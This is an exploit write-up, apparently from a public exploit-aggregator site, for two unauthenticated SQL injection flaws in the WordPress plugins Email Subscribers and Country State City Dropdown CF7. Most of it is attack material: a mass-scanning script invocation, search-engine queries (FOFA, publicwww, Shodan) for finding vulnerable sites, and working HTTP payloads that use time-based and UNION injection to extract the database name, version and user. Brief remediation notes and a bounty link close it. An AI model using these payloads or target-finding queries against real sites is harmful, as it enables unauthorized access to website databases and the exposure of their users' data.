## https://sploitus.com/exploit?id=10F0DB1F-BB40-5E20-844A-96B30ABF7457
---
# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495
This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.
## Vulnerability Descriptions
### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Due to insufficient escaping and lack of SQL query preparation, unauthenticated attackers can exploit this vulnerability to inject malicious SQL, potentially accessing sensitive data.
### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. This insufficient escaping allows unauthenticated attackers to execute arbitrary SQL commands, leading to unauthorized access to sensitive database information.
## Scanner Script
To scan for vulnerabilities in CVE-2024-2876 and CVE-2024-3495, use the following script:
```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```
## Querying for Affected Sites
### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`
### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`
## Proof of Concept (PoC) Code Blocks
### PoC - CVE-2024-2876
Example exploit using the SQL injection vulnerability via the `admin-post.php` endpoint:
```bash
@timeout: 20s (using burpsuite)
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
### PoC - CVE-2024-3495
Example exploit using `admin-ajax.php`:
```bash
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```
## Remediation Steps
### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: Implementing a Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can offer protection against known vulnerabilities by blocking suspicious SQL patterns.
## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)
---